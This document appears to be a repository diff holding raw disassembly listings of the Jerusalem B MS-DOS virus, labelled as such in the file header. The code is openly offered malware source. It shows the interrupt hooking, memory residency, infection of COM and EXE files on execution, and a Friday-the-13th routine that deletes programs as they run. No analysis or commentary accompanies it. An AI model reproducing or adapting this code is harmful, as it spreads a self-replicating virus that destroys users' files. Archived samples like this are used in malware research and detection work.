0000:0646 F1 DB 0F1H
0000:0647 1F POP DS
0000:0648 FFFF ??? DI
0000:064A FFFF ??? DI
0000:064C 0000 ADD [BX+SI],AL
0000:064E 0000 ADD [BX+SI],AL
0000:0650 0000 ADD [BX+SI],AL
0000:0652 0000 ADD [BX+SI],AL
0000:0654 0000 ADD [BX+SI],AL
0000:0656 0000 ADD [BX+SI],AL
0000:0658 0000 ADD [BX+SI],AL
0000:065A 0000 ADD [BX+SI],AL
0000:065C 0000 ADD [BX+SI],AL
0000:065E 0000 ADD [BX+SI],AL
0000:0660 CD21 INT 021H
0000:0662 CB RET ; INTERSEGMENT
0000:0663 0000 X0663: ADD [BX+SI],AL
0000:0665 0000 ADD [BX+SI],AL
0000:0667 0000 ADD [BX+SI],AL
0000:0669 0000 ADD [BX+SI],AL
0000:066B 0000 ADD [BX+SI],AL
0000:066D 2020 AND [BX+SI],AH
0000:066F 2020 AND [BX+SI],AH
0000:0671 2020 AND [BX+SI],AH
0000:0673 2020 AND [BX+SI],AH
0000:0675 2020 AND [BX+SI],AH
0000:0677 2000 AND [BX+SI],AL
0000:0679 0000 ADD [BX+SI],AL
0000:067B 0000 ADD [BX+SI],AL
0000:067D 2020 AND [BX+SI],AH
"JV.MOC" PAGE 0013
0000:067F 2020 AND [BX+SI],AH
0000:0681 2020 AND [BX+SI],AH
0000:0683 2020 AND [BX+SI],AH
0000:0685 2020 AND [BX+SI],AH
0000:0687 2000 AND [BX+SI],AL
0000:0689 0000 ADD [BX+SI],AL
0000:068B 0000 ADD [BX+SI],AL
0000:068D 0000 ADD [BX+SI],AL
0000:068F 0000 ADD [BX+SI],AL
0000:0691 0D6B6F OR AX,06F6BH
0000:0694 6465 JZ X06FB
0000:0696 6572 JNZ X070A
0000:0698 7A2E JPE X06C8
0000:069A 6578 JNZ X0714
0000:069C 6520 JNZ X06BE
0000:069E 613A JNO X06DA
0000:06A0 6B6F JPO X0711
0000:06A2 6465 JZ X0709
0000:06A4 6572 JNZ X0718
0000:06A6 2E6578 JNZ X0721
0000:06A9 650D JNZ X06B8
0000:06AB 0000 ADD [BX+SI],AL
0000:06AD 0000 ADD [BX+SI],AL
0000:06AF 0000 ADD [BX+SI],AL
0000:06B1 0000 ADD [BX+SI],AL
0000:06B3 0000 ADD [BX+SI],AL
0000:06B5 0000 ADD [BX+SI],AL
0000:06B7 0000 ADD [BX+SI],AL
0000:06B9 0000 ADD [BX+SI],AL
0000:06BB 0000 ADD [BX+SI],AL
0000:06BD 0000 ADD [BX+SI],AL
0000:06BF 0000 ADD [BX+SI],AL
0000:06C1 0000 ADD [BX+SI],AL
0000:06C3 0000 ADD [BX+SI],AL
0000:06C5 0000 ADD [BX+SI],AL
0000:06C7 0000 ADD [BX+SI],AL
0000:06C9 0000 ADD [BX+SI],AL
0000:06CB 0000 ADD [BX+SI],AL
0000:06CD 0000 ADD [BX+SI],AL
0000:06CF 0000 ADD [BX+SI],AL
0000:06D1 0000 ADD [BX+SI],AL
0000:06D3 0000 ADD [BX+SI],AL
0000:06D5 0000 ADD [BX+SI],AL
0000:06D7 0000 ADD [BX+SI],AL
0000:06D9 005718 ADD [BX+018H],DL
0000:06DC 0825 OR [DI],AH
0000:06DE A5 MOVSW
0000:06DF FEC5 INC CH
0000:06E1 07 POP ES
0000:06E2 1E PUSH DS
0000:06E3 0210 ADD DL,[BX+SI]
0000:06E5 07 POP ES
0000:06E6 57 PUSH DI
0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
0000:06EB 0104 ADD [SI],AX
0000:06ED 7F70 JG X075F
"JV.MOC" PAGE 0014
0000:06EF 0010 ADD [BX+SI],DL
0000:06F1 07 POP ES
0000:06F2 1D001C SBB AX,01C00H
0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
0000:06F9 0C1B OR AL,01BH
0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
0000:06FF F24D REPNE DEC BP
0000:0701 360E PUSH CS
0000:0703 0300 ADD AX,[BX+SI]
0000:0705 0000 ADD [BX+SI],AL
0000:0707 00EE ADD DH,CH
0000:0709 002A X0709: ADD [BP+SI],CH
0000:070B 0F POP CS
0000:070C 42 INC DX
0000:070D 01C1 ADD CX,AX
0000:070F 0DB44C OR AX,04CB4H
0000:0712 B000 MOV AL,00H
0000:0714 CD21 X0714: INT 021H
0000:0716 4D DEC BP
0000:0717 7344 JAE X075D
0000:0719 6F73 JG X078E

MSDOS/J-Index/Virus.MSDOS.Unknown.jeru-s.asm
+794
View File
@@ -0,0 +1,794 @@
This is the Jerusalem B Virus.
"JV.MOC" PAGE 0001
0000:0000 E99200 JMP X0095
0000:0003 7355 JAE X005A
0000:0005 4D DEC BP
0000:0006 7344 JAE X004C
0000:0008 6F73 JG X007D
0000:000A 0001 ADD [BX+DI],AL
0000:000C BD1700 MOV BP,0017H
0000:000F 0000 ADD [BX+SI],AL
0000:0011 06 PUSH ES
0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
0000:0016 F016 LOCK PUSH SS
0000:0018 17 POP SS
0000:0019 7702 JA X001D
0000:001B BF053D MOV DI,03D05H
0000:001E 0CFB OR AL,0FBH
0000:0020 7D00 JGE X0022
0000:0022 0000 X0022: ADD [BX+SI],AL
0000:0024 0000 ADD [BX+SI],AL
0000:0026 0000 ADD [BX+SI],AL
0000:0028 0000 ADD [BX+SI],AL
0000:002A 0000 ADD [BX+SI],AL
0000:002C 0000 ADD [BX+SI],AL
0000:002E E8062A CALL X2A37
0000:0031 B10D MOV CL,0DH
0000:0033 800000 ADD BYTE PTR [BX+SI],00H
0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
0000:003A 0D5C00 OR AX,005CH
0000:003D B10D MOV CL,0DH
0000:003F 6C00 JL X0041
0000:0041 B10D X0041: MOV CL,0DH
0000:0043 0004 ADD [SI],AL
0000:0045 5F POP DI
0000:0046 0F POP CS
0000:0047 B400 MOV AH,00H
0000:0049 C1 RET ; INTRASEGMENT
0000:004A 0D00F0 X004A: OR AX,0F000H
0000:004D 06 PUSH ES
0000:004E 004D5A ADD [DI+05AH],CL
0000:0051 2000 AND [BX+SI],AL
0000:0053 1000 ADC [BX+SI],AL
0000:0055 1900 SBB [BX+SI],AX
0000:0057 0800 OR [BX+SI],AL
0000:0059 7500 JNZ X005B
0000:005B 7500 X005B: JNZ X005D
0000:005D 6901 X005D: JNS X0060
0000:005F 1007 ADC [BX],AL
0000:0061 8419 TEST BL,[BX+DI]
0000:0063 C500 LDS AX,[BX+SI]
0000:0065 6901 JNS X0068
0000:0067 1C00 SBB AL,00H
0000:0069 0000 ADD [BX+SI],AL
0000:006B 4C X006B: DEC SP
0000:006C B000 MOV AL,00H
0000:006E CD21 INT 021H
0000:0070 050020 ADD AX,02000H
0000:0073 0037 ADD [BX],DH
"JV.MOC" PAGE 0002
0000:0075 121C ADC BL,[SI]
0000:0077 0100 ADD [BX+SI],AX
0000:0079 0210 ADD DL,[BX+SI]
0000:007B 0010 ADD [BX+SI],DL
0000:007D 17 X007D: POP SS
0000:007E 0000 ADD [BX+SI],AL
0000:0080 53 PUSH BX
0000:0081 61E8 JNO X006B
0000:0083 38434F CMP [BP+DI+04FH],AL
0000:0086 4D DEC BP
0000:0087 4D DEC BP
0000:0088 41 INC CX
0000:0089 4E DEC SI
0000:008A 44 INC SP
0000:008B 2E43 INC BX
0000:008D 4F DEC DI
0000:008E 4D DEC BP
0000:008F 0100 ADD [BX+SI],AX
0000:0091 0000 ADD [BX+SI],AL
0000:0093 0000 ADD [BX+SI],AL
0000:0095 FC X0095: CLD
0000:0096 B4E0 MOV AH,0E0H
0000:0098 CD21 INT 021H
0000:009A 80FCE0 CMP AH,0E0H
0000:009D 7316 JAE X00B5
0000:009F 80FC03 CMP AH,03H
0000:00A2 7211 JB X00B5
0000:00A4 B4DD MOV AH,0DDH
0000:00A6 BF0001 MOV DI,0100H
0000:00A9 BE1007 MOV SI,0710H
0000:00AC 03F7 ADD SI,DI
0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
0000:00B3 CD21 INT 021H
0000:00B5 8CC8 X00B5: MOV AX,CS
0000:00B7 051000 ADD AX,0010H
0000:00BA 8ED0 MOV SS,AX
0000:00BC BC0007 MOV SP,0700H
0000:00BF 50 PUSH AX
0000:00C0 B8C500 MOV AX,00C5H
0000:00C3 50 PUSH AX
0000:00C4 CB RET ; INTERSEGMENT
0000:00C5 FC X00C5: CLD
0000:00C6 06 PUSH ES
0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
0000:00DB 8CC0 MOV AX,ES
0000:00DD 051000 ADD AX,0010H
0000:00E0 2E01064900 ADD CS:[Y0049H],AX
0000:00E5 2E01064500 ADD CS:[Y0045H],AX
0000:00EA B4E0 MOV AH,0E0H
0000:00EC CD21 INT 021H
0000:00EE 80FCE0 CMP AH,0E0H
0000:00F1 7313 JAE X0106
0000:00F3 80FC03 CMP AH,03H
"JV.MOC" PAGE 0003
0000:00F6 07 POP ES
0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
0000:0101 2EFF2E4700 JMP CS:[Y0047H]
0000:0106 33C0 X0106: XOR AX,AX
0000:0108 8EC0 MOV ES,AX
0000:010A 26A1FC03 MOV AX,ES:Y03FCH
0000:010E 2EA34B00 MOV CS:Y004BH,AX
0000:0112 26A0FE03 MOV AL,ES:Y03FEH
0000:0116 2EA24D00 MOV CS:Y004DH,AL
0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
0000:0127 58 POP AX
0000:0128 051000 ADD AX,0010H
0000:012B 8EC0 MOV ES,AX
0000:012D 0E PUSH CS
0000:012E 1F POP DS
0000:012F B91007 MOV CX,0710H
0000:0132 D1E9 SHR CX,1
0000:0134 33F6 XOR SI,SI
0000:0136 8BFE MOV DI,SI
0000:0138 06 PUSH ES
0000:0139 B84201 MOV AX,0142H
0000:013C 50 PUSH AX
0000:013D EAFC030000 JMP X0000_03FC
0000:0142 8CC8 MOV AX,CS
0000:0144 8ED0 MOV SS,AX
0000:0146 BC0007 MOV SP,0700H
0000:0149 33C0 XOR AX,AX
0000:014B 8ED8 MOV DS,AX
0000:014D 2EA14B00 MOV AX,CS:Y004BH
0000:0151 A3FC03 MOV Y03FCH,AX
0000:0154 2EA04D00 MOV AL,CS:Y004DH
0000:0158 A2FE03 MOV Y03FEH,AL
0000:015B 8BDC MOV BX,SP
0000:015D B104 MOV CL,04H
0000:015F D3EB SHR BX,CL
0000:0161 83C310 ADD BX,0010H
0000:0164 2E891E3300 MOV CS:[Y0033H],BX
0000:0169 B44A MOV AH,04AH
0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
0000:0170 CD21 INT 021H
0000:0172 B82135 MOV AX,03521H
0000:0175 CD21 INT 021H
0000:0177 2E891E1700 MOV CS:[Y0017H],BX
0000:017C 2E8C061900 MOV CS:[Y0019H],ES
0000:0181 0E PUSH CS
0000:0182 1F POP DS
0000:0183 BA5B02 MOV DX,025BH
0000:0186 B82125 MOV AX,02521H
0000:0189 CD21 INT 021H
0000:018B 8E063100 MOV ES,[Y0031H]
0000:018F 268E062C00 MOV ES,ES:[Y002CH]
0000:0194 33FF XOR DI,DI
0000:0196 B9FF7F MOV CX,07FFFH
0000:0199 32C0 XOR AL,AL
"JV.MOC" PAGE 0004
0000:019B F2AE X019B: REPNE SCASB
0000:019D 263805 CMP ES:[DI],AL
0000:01A0 E0F9 LOOPNZ X019B
0000:01A2 8BD7 MOV DX,DI
0000:01A4 83C203 ADD DX,0003H
0000:01A7 B8004B MOV AX,04B00H
0000:01AA 06 PUSH ES
0000:01AB 1F POP DS
0000:01AC 0E PUSH CS
0000:01AD 07 POP ES
0000:01AE BB3500 MOV BX,0035H
0000:01B1 1E PUSH DS
0000:01B2 06 PUSH ES
0000:01B3 50 PUSH AX
0000:01B4 53 PUSH BX
0000:01B5 51 PUSH CX
0000:01B6 52 PUSH DX
0000:01B7 B42A MOV AH,02AH
0000:01B9 CD21 INT 021H
0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
0000:01C1 81F9C307 CMP CX,07C3H
0000:01C5 7430 JZ X01F7
0000:01C7 3C05 CMP AL,05H
0000:01C9 750D JNZ X01D8
0000:01CB 80FA0D CMP DL,0DH
0000:01CE 7508 JNZ X01D8
0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
0000:01D5 EB20 JMP X01F7
0000:01D7 90 NOP
0000:01D8 B80835 X01D8: MOV AX,03508H
0000:01DB CD21 INT 021H
0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
0000:01E7 0E PUSH CS
0000:01E8 1F POP DS
0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
0000:01EF B80825 MOV AX,02508H
0000:01F2 BA1E02 MOV DX,021EH
0000:01F5 CD21 INT 021H
0000:01F7 5A X01F7: POP DX
0000:01F8 59 POP CX
0000:01F9 5B POP BX
0000:01FA 58 POP AX
0000:01FB 07 POP ES
0000:01FC 1F POP DS
0000:01FD 9C PUSHF
0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
0000:0203 1E PUSH DS
0000:0204 07 POP ES
0000:0205 B449 MOV AH,049H
0000:0207 CD21 INT 021H
0000:0209 B44D MOV AH,04DH
0000:020B CD21 INT 021H
0000:020D B431 MOV AH,031H
0000:020F BA0006 MOV DX,0600H
0000:0212 B104 MOV CL,04H
"JV.MOC" PAGE 0005
0000:0214 D3EA SHR DX,CL
0000:0216 83C210 ADD DX,0010H
0000:0219 CD21 INT 021H
0000:021B 32C0 XOR AL,AL
0000:021D CF IRET
0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
0000:0224 7517 JNZ X023D
0000:0226 50 PUSH AX
0000:0227 53 PUSH BX
0000:0228 51 PUSH CX
0000:0229 52 PUSH DX
0000:022A 55 PUSH BP
0000:022B B80206 MOV AX,0602H
0000:022E B787 MOV BH,087H
0000:0230 B90505 MOV CX,0505H
0000:0233 BA1010 MOV DX,01010H
0000:0236 CD10 INT 010H
0000:0238 5D POP BP
0000:0239 5A POP DX
0000:023A 59 POP CX
0000:023B 5B POP BX
0000:023C 58 POP AX
0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
0000:0242 7512 JNZ X0256
0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
0000:024B 50 PUSH AX
0000:024C 51 PUSH CX
0000:024D 56 PUSH SI
0000:024E B90140 MOV CX,04001H
0000:0251 F3AC REPE LODSB
0000:0253 5E POP SI
0000:0254 59 POP CX
0000:0255 58 POP AX
0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
0000:025B 9C X025B: PUSHF
0000:025C 80FCE0 CMP AH,0E0H
0000:025F 7505 JNZ X0266
0000:0261 B80003 MOV AX,0300H
0000:0264 9D POPF
0000:0265 CF IRET
0000:0266 80FCDD X0266: CMP AH,0DDH
0000:0269 7413 JZ X027E
0000:026B 80FCDE CMP AH,0DEH
0000:026E 7428 JZ X0298
0000:0270 3D004B CMP AX,04B00H
0000:0273 7503 JNZ X0278
0000:0275 E9B400 JMP X032C
0000:0278 9D X0278: POPF
0000:0279 2EFF2E1700 JMP CS:[Y0017H]
0000:027E 58 X027E: POP AX
0000:027F 58 POP AX
0000:0280 B80001 MOV AX,0100H
0000:0283 2EA30A00 MOV CS:Y000AH,AX
0000:0287 58 POP AX
0000:0288 2EA30C00 MOV CS:Y000CH,AX
0000:028C F3A4 REPE MOVSB
"JV.MOC" PAGE 0006
0000:028E 9D POPF
0000:028F 2EA10F00 MOV AX,CS:Y000FH
0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
0000:0298 83C406 X0298: ADD SP,0006H
0000:029B 9D POPF
0000:029C 8CC8 MOV AX,CS
0000:029E 8ED0 MOV SS,AX
0000:02A0 BC1007 MOV SP,0710H
0000:02A3 06 PUSH ES
0000:02A4 06 PUSH ES
0000:02A5 33FF XOR DI,DI
0000:02A7 0E PUSH CS
0000:02A8 07 POP ES
0000:02A9 B91000 MOV CX,0010H
0000:02AC 8BF3 MOV SI,BX
0000:02AE BF2100 MOV DI,0021H
0000:02B1 F3A4 REPE MOVSB
0000:02B3 8CD8 MOV AX,DS
0000:02B5 8EC0 MOV ES,AX
0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
0000:02C1 83D200 ADC DX,0000H
0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
0000:02C9 8ED8 MOV DS,AX
0000:02CB 8BF2 MOV SI,DX
0000:02CD 8BFA MOV DI,DX
0000:02CF 8CC5 MOV BP,ES
0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
0000:02D6 0BDB OR BX,BX
0000:02D8 7413 JZ X02ED
0000:02DA B90080 X02DA: MOV CX,08000H
0000:02DD F3A5 REPE MOVSW
0000:02DF 050010 ADD AX,01000H
0000:02E2 81C50010 ADD BP,01000H
0000:02E6 8ED8 MOV DS,AX
0000:02E8 8EC5 MOV ES,BP
0000:02EA 4B DEC BX
0000:02EB 75ED JNZ X02DA
0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
0000:02F2 F3A4 REPE MOVSB
0000:02F4 58 POP AX
0000:02F5 50 PUSH AX
0000:02F6 051000 ADD AX,0010H
0000:02F9 2E01062900 ADD CS:[Y0029H],AX
0000:02FE 2E01062500 ADD CS:[Y0025H],AX
0000:0303 2EA12100 MOV AX,CS:Y0021H
0000:0307 1F POP DS
0000:0308 07 POP ES
0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
0000:0313 2EFF2E2300 JMP CS:[Y0023H]
0000:0318 33C9 X0318: XOR CX,CX
0000:031A B80143 MOV AX,04301H
0000:031D CD21 INT 021H
0000:031F B441 MOV AH,041H
0000:0321 CD21 INT 021H
"JV.MOC" PAGE 0007
0000:0323 B8004B MOV AX,04B00H
0000:0326 9D POPF
0000:0327 2EFF2E1700 JMP CS:[Y0017H]
0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
0000:0332 74E4 JZ X0318
0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
0000:0342 2E89168000 MOV CS:[Y0080H],DX
0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
0000:034C 50 PUSH AX
0000:034D 53 PUSH BX
0000:034E 51 PUSH CX
0000:034F 52 PUSH DX
0000:0350 56 PUSH SI
0000:0351 57 PUSH DI
0000:0352 1E PUSH DS
0000:0353 06 PUSH ES
0000:0354 FC CLD
0000:0355 8BFA MOV DI,DX
0000:0357 32D2 XOR DL,DL
0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
0000:035D 7505 JNZ X0364
0000:035F 8A15 MOV DL,[DI]
0000:0361 80E21F AND DL,01FH
0000:0364 B436 X0364: MOV AH,036H
0000:0366 CD21 INT 021H
0000:0368 3DFFFF CMP AX,0FFFFH
0000:036B 7503 JNZ X0370
0000:036D E97702 X036D: JMP X05E7
0000:0370 F7E3 X0370: MUL BX
0000:0372 F7E1 MUL CX
0000:0374 0BD2 OR DX,DX
0000:0376 7505 JNZ X037D
0000:0378 3D1007 CMP AX,0710H
0000:037B 72F0 JB X036D
0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
0000:0382 1E PUSH DS
0000:0383 07 POP ES
0000:0384 32C0 XOR AL,AL
0000:0386 B94100 MOV CX,0041H
0000:0389 F2AE REPNE SCASB
0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
0000:0390 8A04 X0390: MOV AL,[SI]
0000:0392 0AC0 OR AL,AL
0000:0394 740E JZ X03A4
0000:0396 3C61 CMP AL,061H
0000:0398 7207 JB X03A1
0000:039A 3C7A CMP AL,07AH
0000:039C 7703 JA X03A1
0000:039E 802C20 SUB BYTE PTR [SI],020H
0000:03A1 46 X03A1: INC SI
0000:03A2 EBEC JMP X0390
0000:03A4 B90B00 X03A4: MOV CX,000BH
0000:03A7 2BF1 SUB SI,CX
0000:03A9 BF8400 MOV DI,0084H
0000:03AC 0E PUSH CS
"JV.MOC" PAGE 0008
0000:03AD 07 POP ES
0000:03AE B90B00 MOV CX,000BH
0000:03B1 F3A6 REPE CMPSB
0000:03B3 7503 JNZ X03B8
0000:03B5 E92F02 JMP X05E7
0000:03B8 B80043 X03B8: MOV AX,04300H
0000:03BB CD21 INT 021H
0000:03BD 7205 JB X03C4
0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
0000:03C4 7225 X03C4: JB X03EB
0000:03C6 32C0 XOR AL,AL
0000:03C8 2EA24E00 MOV CS:Y004EH,AL
0000:03CC 1E PUSH DS
0000:03CD 07 POP ES
0000:03CE 8BFA MOV DI,DX
0000:03D0 B94100 MOV CX,0041H
0000:03D3 F2AE REPNE SCASB
0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
0000:03D9 740B JZ X03E6
0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
0000:03DF 7405 JZ X03E6
0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
0000:03E6 B8003D X03E6: MOV AX,03D00H
0000:03E9 CD21 INT 021H
0000:03EB 725A X03EB: JB X0447
0000:03ED 2EA37000 MOV CS:Y0070H,AX
0000:03F1 8BD8 MOV BX,AX
0000:03F3 B80242 MOV AX,04202H
0000:03F6 B9FFFF MOV CX,0FFFFH
0000:03F9 BAFBFF MOV DX,0FFFBH
0000:03FC CD21 X03FC: INT 021H
0000:03FE 72EB JB X03EB
0000:0400 050500 ADD AX,0005H
0000:0403 2EA31100 MOV CS:Y0011H,AX
0000:0407 B90500 MOV CX,0005H
0000:040A BA6B00 MOV DX,006BH
0000:040D 8CC8 MOV AX,CS
0000:040F 8ED8 MOV DS,AX
0000:0411 8EC0 MOV ES,AX
0000:0413 B43F MOV AH,03FH
0000:0415 CD21 INT 021H
0000:0417 8BFA MOV DI,DX
0000:0419 BE0500 MOV SI,0005H
0000:041C F3A6 REPE CMPSB
0000:041E 7507 JNZ X0427
0000:0420 B43E MOV AH,03EH
0000:0422 CD21 INT 021H
0000:0424 E9C001 JMP X05E7
0000:0427 B82435 X0427: MOV AX,03524H
0000:042A CD21 INT 021H
0000:042C 891E1B00 MOV [Y001BH],BX
0000:0430 8C061D00 MOV [Y001DH],ES
0000:0434 BA1B02 MOV DX,021BH
0000:0437 B82425 MOV AX,02524H
0000:043A CD21 INT 021H
0000:043C C5168000 LDS DX,[Y0080H]
"JV.MOC" PAGE 0009
0000:0440 33C9 XOR CX,CX
0000:0442 B80143 MOV AX,04301H
0000:0445 CD21 INT 021H
0000:0447 723B X0447: JB X0484
0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:044E B43E MOV AH,03EH
0000:0450 CD21 INT 021H
0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:0459 B8023D MOV AX,03D02H
0000:045C CD21 INT 021H
0000:045E 7224 JB X0484
0000:0460 2EA37000 MOV CS:Y0070H,AX
0000:0464 8CC8 MOV AX,CS
0000:0466 8ED8 MOV DS,AX
0000:0468 8EC0 MOV ES,AX
0000:046A 8B1E7000 MOV BX,[Y0070H]
0000:046E B80057 MOV AX,05700H
0000:0471 CD21 INT 021H
0000:0473 89167400 MOV [Y0074H],DX
0000:0477 890E7600 MOV [Y0076H],CX
0000:047B B80042 MOV AX,04200H
0000:047E 33C9 XOR CX,CX
0000:0480 8BD1 MOV DX,CX
0000:0482 CD21 INT 021H
0000:0484 723D X0484: JB X04C3
0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
0000:048B 7403 JZ X0490
0000:048D EB57 JMP X04E6
0000:048F 90 NOP
0000:0490 BB0010 X0490: MOV BX,01000H
0000:0493 B448 MOV AH,048H
0000:0495 CD21 INT 021H
0000:0497 730B JAE X04A4
0000:0499 B43E MOV AH,03EH
0000:049B 8B1E7000 MOV BX,[Y0070H]
0000:049F CD21 INT 021H
0000:04A1 E94301 JMP X05E7
0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
0000:04A8 8EC0 MOV ES,AX
0000:04AA 33F6 XOR SI,SI
0000:04AC 8BFE MOV DI,SI
0000:04AE B91007 MOV CX,0710H
0000:04B1 F3A4 REPE MOVSB
0000:04B3 8BD7 MOV DX,DI
0000:04B5 8B0E1100 MOV CX,[Y0011H]
0000:04B9 8B1E7000 MOV BX,[Y0070H]
0000:04BD 06 PUSH ES
0000:04BE 1F POP DS
0000:04BF B43F MOV AH,03FH
0000:04C1 CD21 INT 021H
0000:04C3 721C X04C3: JB X04E1
0000:04C5 03F9 ADD DI,CX
0000:04C7 33C9 XOR CX,CX
0000:04C9 8BD1 MOV DX,CX
0000:04CB B80042 MOV AX,04200H
0000:04CE CD21 INT 021H
"JV.MOC" PAGE 0010
0000:04D0 BE0500 MOV SI,0005H
0000:04D3 B90500 MOV CX,0005H
0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
R (SI)
0000:04D9 8BCF MOV CX,DI
0000:04DB 33D2 XOR DX,DX
0000:04DD B440 MOV AH,040H
0000:04DF CD21 INT 021H
0000:04E1 720D X04E1: JB X04F0
0000:04E3 E9BC00 JMP X05A2
0000:04E6 B91C00 X04E6: MOV CX,001CH
0000:04E9 BA4F00 MOV DX,004FH
0000:04EC B43F MOV AH,03FH
0000:04EE CD21 INT 021H
0000:04F0 724A X04F0: JB X053C
0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
0000:04F8 A15D00 MOV AX,Y005DH
0000:04FB A34500 MOV Y0045H,AX
0000:04FE A15F00 MOV AX,Y005FH
0000:0501 A34300 MOV Y0043H,AX
0000:0504 A16300 MOV AX,Y0063H
0000:0507 A34700 MOV Y0047H,AX
0000:050A A16500 MOV AX,Y0065H
0000:050D A34900 MOV Y0049H,AX
0000:0510 A15300 MOV AX,Y0053H
0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
0000:0518 7401 JZ X051B
0000:051A 48 DEC AX
0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
0000:051F 03065100 ADD AX,[Y0051H]
0000:0523 83D200 ADC DX,0000H
0000:0526 050F00 ADD AX,000FH
0000:0529 83D200 ADC DX,0000H
0000:052C 25F0FF AND AX,0FFF0H
0000:052F A37C00 MOV Y007CH,AX
0000:0532 89167E00 MOV [Y007EH],DX
0000:0536 051007 ADD AX,0710H
0000:0539 83D200 ADC DX,0000H
0000:053C 723A X053C: JB X0578
0000:053E F7367800 DIV WORD PTR [Y0078H]
0000:0542 0BD2 OR DX,DX
0000:0544 7401 JZ X0547
0000:0546 40 INC AX
0000:0547 A35300 X0547: MOV Y0053H,AX
0000:054A 89165100 MOV [Y0051H],DX
0000:054E A17C00 MOV AX,Y007CH
0000:0551 8B167E00 MOV DX,[Y007EH]
0000:0555 F7367A00 DIV WORD PTR [Y007AH]
0000:0559 2B065700 SUB AX,[Y0057H]
0000:055D A36500 MOV Y0065H,AX
0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
0000:0566 A35D00 MOV Y005DH,AX
0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
0000:056F 33C9 XOR CX,CX
0000:0571 8BD1 MOV DX,CX
0000:0573 B80042 MOV AX,04200H
0000:0576 CD21 INT 021H
"JV.MOC" PAGE 0011
0000:0578 720A X0578: JB X0584
0000:057A B91C00 MOV CX,001CH
0000:057D BA4F00 MOV DX,004FH
0000:0580 B440 MOV AH,040H
0000:0582 CD21 INT 021H
0000:0584 7211 X0584: JB X0597
0000:0586 3BC1 CMP AX,CX
0000:0588 7518 JNZ X05A2
0000:058A 8B167C00 MOV DX,[Y007CH]
0000:058E 8B0E7E00 MOV CX,[Y007EH]
0000:0592 B80042 MOV AX,04200H
0000:0595 CD21 INT 021H
0000:0597 7209 X0597: JB X05A2
0000:0599 33D2 XOR DX,DX
0000:059B B91007 MOV CX,0710H
0000:059E B440 MOV AH,040H
0000:05A0 CD21 INT 021H
0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
0000:05A8 7404 JZ X05AE
0000:05AA B449 MOV AH,049H
0000:05AC CD21 INT 021H
0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
0000:05B4 7431 JZ X05E7
0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
0000:05C5 B80157 MOV AX,05701H
0000:05C8 CD21 INT 021H
0000:05CA B43E MOV AH,03EH
0000:05CC CD21 INT 021H
0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
0000:05D8 B80143 MOV AX,04301H
0000:05DB CD21 INT 021H
0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
0000:05E2 B82425 MOV AX,02524H
0000:05E5 CD21 INT 021H
0000:05E7 07 X05E7: POP ES
0000:05E8 1F POP DS
0000:05E9 5F POP DI
0000:05EA 5E POP SI
